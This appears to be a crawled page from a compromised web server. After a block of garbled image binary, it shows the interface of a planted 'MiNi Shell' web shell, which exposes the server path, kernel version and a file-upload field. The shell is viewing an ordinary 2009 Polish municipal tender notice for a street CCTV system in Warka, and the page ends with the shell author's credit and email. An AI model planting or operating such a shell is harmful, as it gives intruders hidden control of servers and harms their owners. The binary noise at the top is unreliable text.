JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090803/125901-N-2009.html

<p class="kh_header"><b>Warka: Zaprojektowanie i wykonanie cyfrowego systemu monitoringu wizyjnego ulic w Warce</b><br>
<b>Numer ogłoszenia: 125901 - 2009; data zamieszczenia: 03.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Warka , Plac St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, tel. 048 665 12 00, faks 048 665 12 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie cyfrowego systemu monitoringu wizyjnego ulic w Warce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
Zaprojektowanie i wykonanie cyfrowego systemu monitoringu wizyjnego ulic Warki w następujących etapach:
Zadanie 1.
Etap I zaprojektowanie i  wykonanie systemu 8 kamer wg.  programu funkcjonalno-użytkowego i projektu koncepcyjnego - załączniki 3-A1 i 3-A2,(uwaga wg. koncepcji jest 10 kamer - nie będą wykonywane kamery nr K-8 i K-10)  oraz zaprojektowanie i wykonanie 6 dodatkowych nie ujętych w koncepcji  kamer zgodnie z pkt. 11. niniejszego opisu przedmiotu zamówienia - sieć światłowodowa napowietrzna i ziemna uwzględniając pozostałe etapy. Zaprojektowanie i wykonanie centrum nadzoru w budynku Komisariatu Policji w Warce.  
Zadanie 2. ,w którym wszystkie etapy są z prawem opcji (plus, minus jedna kamera) w każdym etapie
Etap II zaprojektowanie sieci i min. 4 kamer  - ul. Senatorska i ul. Franciszkańska do parku przy ul. Franciszkańskiej, sieć światłowodowa ziemna.
Etap III koncepcja sieci światłowodowej  i min. 5 kamer dla planowanego pasażu pieszo-rowerowego w kierunku wałów nad Pilicą.
Etap IV zaprojektowanie dodatkowych kamer na trasie planowanej w etapie I , min. 3 kamer, sieć w systemie mieszanym.
Etap V zaprojektowanie sieci i min. 2 kamer - ul. Grójecka do stacji PKP sieć światłowodowa napowietrzna.
Etap VI zaprojektowanie sieci i min. 2 kamer  - ul. Polna sieć w systemie mieszanym.
W projekcie należy przewidzieć możliwość włączenia do sieci monitoringu wewnętrznego szkół :Gimnazjum, Szkoła podstawowa nr 1 i nr 2 oraz przedszkole. 
Etap VII zaprojektowanie 1 kamery szybkoobrotowej  - ul. Niemojewska, system przesyłu danych - kablowy lub radiowy do zaproponowania przez Wykonawcę.  
      Dalszy opis przedmiotu zamówienia zawarty jest w SIWZ na stronie internetowej: www.warka.pl/zp.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4, 30.00.00.00-3, 32.23.50.00-9, 29.81.61.00-3, 45.31.11.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10000.00zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:

1)   spełniają warunki określone w art.22 oraz nie podlegają wykluczeniu z postępowania 
      o zamówienie publiczne z art. 24, zgodnie z ustawą z dnia 29 stycznia 2004r. - Prawo 
      zamówień publicznych (Dz. U. z 2007r. Nr 223, poz. 1655 oraz z 2008 r. Nr 171, poz. 1058, 
      z  póź. zm.)

2)  Posiadają uprawnienia do wykonywania działalności lub czynności, w zakresie objętym 
     niniejszym zamówieniem - między innymi minimum 1 osobę posiadającą licencję pracownika 
     zabezpieczenia technicznego II stopnia,

3)  informacja o przeciętnej liczbie zatrudnionych pracowników oraz liczebności personelu 
     kierowniczego, w okresie ostatnich trzech lat a jeżeli okres prowadzenia działalności jest 
     krótszy - w tym okresie. Wymagane jest zatrudnianie minimum 10 pracowników.  

4)  dysponują osobami zdolnymi do wykonania zamówienia. Zamawiający uzna, że wykonawca  
     dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wykaże on, że dysponuje co 
      najmniej:
      a) minimum 2 osoby (projektant + sprawdzający) posiadający uprawnienia do projektowania
          w specjalności elektrycznej (osoby te muszą przynależeć do właściwej izby samorządu 
          zawodowego) 
      b) minimum 1 osobą posiadającą uprawnienia do kierowania robotami w specjalności   
          elektrycznej (osoba ta musi przynależeć do właściwej izby samorządu zawodowego)
c) minimum 1 osobą posiadającą licencję pracownika zabezpieczenia technicznego II stopnia,
                                                           
5)   wykonali należycie w ciągu ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, 
      a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej jedno 
      zamówienie o podobnych charakterze. Zamawiający za zamówienie podobne rozumie
      wykonanie projektu oraz realizacji wg projektu systemu monitoringu wizyjnego w terenie 
      miejskim, dla którego zakres i rodzaj prac jest zbliżony (min. 10 kamer).

Ocena spełniania powyższych warunków dokonana zostanie na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów, wg formuły: - spełnia, nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy przystępujący do przetargu zobowiązują się przedłożyć następujące dokumenty i oświadczenia:
          1.   aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do 
                ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
                 rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie 
                wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Powyższy dokument 
                może być kserokopią potwierdzoną przez Wykonawcę za zgodność z oryginałem, 

          2.  Kserokopie dokumentów potwierdzające:
-   posiadanie odpowiednich uprawnień zawodowych bez ograniczeń w branży elektrycznej
    do projektowania (dla projektanta i sprawdzającego) i osobę w branży elektrycznej
    przydzieloną do kierowania wykonywaniem prac (kierownika budowy) będących
    przedmiotem zamówienia zgodnie z art. 14 ust. 1   ustawy z dnia 7  lipca 1994r. prawo
    budowlane (tekst jednolity Dz. U. z 2003r. Nr 207, poz. 2016 z póź. zm.) 
	-  przynależność do właściwej terytorialnie dla miejsca zamieszkania izby zawodowej 
               zgodnie z art. 12 ust. 7 w/w ustawy odpowiednio we wszystkich branżach (projektant, 
               sprawdzający, kierownik budowy).
           -  posiadaną licencję pracownika zabezpieczenia technicznego II stopnia
           -  polisę lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest
               ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;

            3. aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
    
            4.  aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia
                 właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w 
                  zakresie określonym w art. 24 ust.1  pkt 4 - 8 ustawy pzp, wystawioną nie wcześniej 
                  niż 6 miesięcy przed upływem terminu składania ofert;

            5. aktualną informację z Krajowego Rejestru Karnego w zakresie określonym
                 w art. 24 ust. 1  pkt  9 ustawy  Pzp,  wystawioną nie wcześniej  niż 6 miesięcy przed
                 upływem terminu składania ofert ( dotyczy podmiotów zbiorowych, zgodnie z ustawą 
                 z dnia 28  października 2002r o odpowiedzialności podmiotów zbiorowych za czyny 
                 zabronione pod groźbą kary ;( DZ. U. Nr 197,poz. 1661 );

6.	informację na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności 
           personelu kierowniczego, w okresie ostatnich trzech lat a jeżeli okres prowadzenia
           działalności jest krótszy - w tym okresie wg zał. Nr 6 do SIWZ. Wymagane jest 
           zatrudnianie minimum 10 pracowników średnio.

            7. wykaz osób (kierujących pracami) i podmiotów, które będą wykonywać zamówienie 
                lub będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich 
                kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych 
                przez nich czynności (wg załącznika nr 6 do SIWZ) - należy wykazać co najmniej
                projektanta, sprawdzającego, kierownika budowy, osobę posiadającą licencję 
                pracownika zabezpieczenia technicznego II stopnia - wg pkt. 2.
 

        
          8.  oświadczenie wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 
      pkt 1, 2 i 3  ustawy Pzp oraz o niepodleganiu wykluczeniu na podst. art. 24 ustawy 
      Pzp -   wg załącznika nr 2 do SIWZ;
 
   9. wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o 
        udzielenie zamówienia robót budowlanych, a jeżeli okres prowadzenia działalności jest 
        krótszy -  w tym okresie, odpowiadających swoim rodzajem i wartością  robotom 
        budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca 
        wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane 
        należycie (np. referencje, faktury, protokół odbioru) potwierdzonych przez Wykonawcę za 
        zgodność z oryginałem - wg załącznika nr 4. Wymagane jest wykazanie się 
        zaprojektowaniem i wykonaniem co najmniej systemu monitoringu wizyjnego w terenie
        miejskim, dla którego zakres i rodzaj prac jest zbliżony do niniejszego zamówienia 
        (min. 10 kamer)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.warka.pl/zp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Warce, pl. St. Czarnieckiego 1, 05-660 Warka, woj. mazowieckie, w godz. 8°° - 15°° do dnia 25.08.2009r. - informacja w BIURZE OBSŁUGI..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2009 godzina 12:00, miejsce: w siedzibie Zamawiającego, Biuro Obsługi..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com